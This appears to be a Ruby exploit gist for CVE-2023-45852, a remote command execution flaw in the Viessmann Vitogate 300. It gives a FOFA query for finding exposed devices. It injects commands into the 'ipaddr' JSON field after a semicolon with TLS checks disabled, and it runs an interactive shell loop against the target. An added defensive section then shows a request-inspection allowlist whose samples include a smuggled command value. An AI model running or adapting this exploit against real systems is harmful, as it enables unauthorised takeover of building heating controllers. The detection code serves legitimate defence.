@komodoooo
Created October 29, 2023 14:32
CVE-2023-45852 exploit
require 'http'
require 'openssl'
require 'json'

puts """
CVE-2023-45852
Viessmann Vitogate 300 RCE exploit
By komodo\n
"""

=begin
FOFA query to search vulnerable targets:
title="Vitogate 300"
=end

# Sends one JSON request to vitogate.cgi and prints the part of the
# "traceinfo" response field that follows the "Unknown host" message.
def main(url, cmd)
  # Drop a trailing slash so the path below is not doubled.
  url.delete_suffix!("/")
  # TLS certificate verification is disabled for the request.
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  # The session is empty; params.ipaddr carries the command after a ";".
  payload = {
    :method  => "put",
    :form    => "form-4-8",
    :session => "",
    :params  => { :ipaddr => "sex123;#{cmd}" }
  }
  r = HTTP.post("#{url}/cgi-bin/vitogate.cgi",
                :headers => { "Content-Type" => "application/json" },
                :json => payload,
                :ssl_context => ctx)
  if r.code == 200
    puts JSON.parse(r.body.to_s.gsub("\n", ""))["traceinfo"].split("Unknown host")[1]
  else
    puts "Not vulnerable! :(\n"
  end
end

begin
  print "Base URL: "
  target = gets.chomp
  # Read commands in a loop and send each one to the target.
  while true
    print "\r$ "
    main(target, gets.chomp)
  end
rescue => e
  abort(e.to_s)
end
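
From the defender's side, the request above is recognisable by a `params.ipaddr` value that is not a plain host. The following is an added example, not part of the gist: a check that a reverse proxy or log pipeline could apply to bodies posted to `/cgi-bin/vitogate.cgi`. The names `inspect_request`, `scan`, `SAFE_HOST` and the sample requests are constructed for illustration, and the allowlist assumes legitimate values are IPv4 addresses or hostnames.

```ruby
require 'json'

# Added defensive example; not part of the gist.
ENDPOINT = "/cgi-bin/vitogate.cgi"
# Assumption: a legitimate ipaddr value is an IPv4 address or DNS hostname,
# so only letters, digits, dots and hyphens are accepted. \A and \z anchor
# the whole string, so a trailing newline cannot slip past the check.
SAFE_HOST = /\A[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?\z/

# Returns nil for a benign-looking request, otherwise a short reason string.
def inspect_request(path, body)
  return nil unless path.split("?").first == ENDPOINT
  doc = JSON.parse(body)
  return "body is not a JSON object" unless doc.is_a?(Hash)
  params = doc["params"]
  return nil unless params.is_a?(Hash) && params.key?("ipaddr")
  value = params["ipaddr"]
  return "ipaddr is not a string" unless value.is_a?(String)
  return nil if SAFE_HOST.match?(value)
  reason = "ipaddr fails host allowlist"
  reason += ", empty session" if doc["session"].to_s.empty?
  reason
rescue JSON::ParserError
  "unparseable JSON body"
end

# Constructed sample requests as [path, body] pairs, for illustration only.
SAMPLES = [
  ["/cgi-bin/vitogate.cgi",
   '{"method":"put","form":"form-4-8","session":"abc123","params":{"ipaddr":"192.168.1.10"}}'],
  ["/cgi-bin/vitogate.cgi",
   '{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"x;id"}}'],
  ["/cgi-bin/vitogate.cgi",
   '{"method":"put","form":"form-4-8","session":"abc123","params":{"ipaddr":"10.0.0.5\n"}}'],
  ["/index.html", ""],
]

# Runs the check over a list of [path, body] pairs.
def scan(samples)
  samples.map { |path, body| inspect_request(path, body) }
end

if __FILE__ == $0
  scan(SAMPLES).each_with_index { |r, i| puts "request #{i}: #{r || 'ok'}" }
end
```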